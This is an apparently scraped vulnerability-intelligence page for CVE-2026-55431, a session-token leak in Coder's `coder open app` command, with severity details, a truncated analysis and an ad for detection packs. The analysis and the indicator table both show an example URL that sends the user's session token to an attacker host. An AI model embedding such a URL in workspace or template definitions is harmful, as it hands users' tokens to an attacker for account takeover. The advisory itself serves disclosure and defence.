HomeCVE Intelligence › CVE-2026-55431
CVSS 7.7 HIGH Vulnerability

CVE-2026-55431: Coder's session token leaked to arbitrary hosts via `coder open app` for external workspa…

Summary coder open app opens external workspace-app URLs without validating the scheme or host. When an external app URL contains the $SESSION_TOKEN placeholder the CLI replaces it with the user's real session token bef…

7.7CVSS Score
HIGHSeverity
NOCISA KEV
VulnerabilityImpact Type

📋 Vulnerability Details

CVE IDCVE-2026-55431
Vendorgo
Affected Productgithub.com/coder/coder/v2
Vulnerability TypeVulnerability
CVSS Score7.7 (HIGH)
Actively Exploited❌ No known exploitation
Patch StatusSee Vendor Advisory →
Reported ByCYBERDUDEBIVASH SENTINEL APEX Intelligence (via github_advisories)

🔬 Technical Analysis

#

Summary coder open app opens external workspace-app URLs without validating the scheme or host. When an external app URL contains the $SESSION_TOKEN placeholder the CLI replaces it with the user's real session token before handing the URL to the OS open handler. > Note: Practical exploitation requires the victim to run coder open app against a workspace whose external app definition the attacker controls. Only a malicious template author can control external app URLs.

Impact Workspace code can register external apps with arbitrary URLs so an attacker who controls workspace contents can define a URL like https://attacker.example/?t=$SESSION_TOKEN. Running coder open app then sends the user's session token to the attacker and enables full account impersonation for the t

🎯 Known Indicators of Compromise

{"type":"url","value":"https://attacker.example/?t=$SESSION_TOKEN`.","confidence_score":0.82,"first_seen":"2026-07-06","source_count":1}

📚 Advisory References

⚡ DETECTION RULES AVAILABLE

Get CVE-2026-55431 Detection Pack

Sigma rules, YARA signatures, IOC table, and SIEM queries for Splunk, Elastic, Sentinel, and Chronicle — deployable in 5 minutes.

✓ Sigma Rules ✓ YARA Pack ✓ IOC Table ✓ SIEM Queries
🛡️ Get Detection Pack → 🔌 Access via API →

🔗 Related Intelligence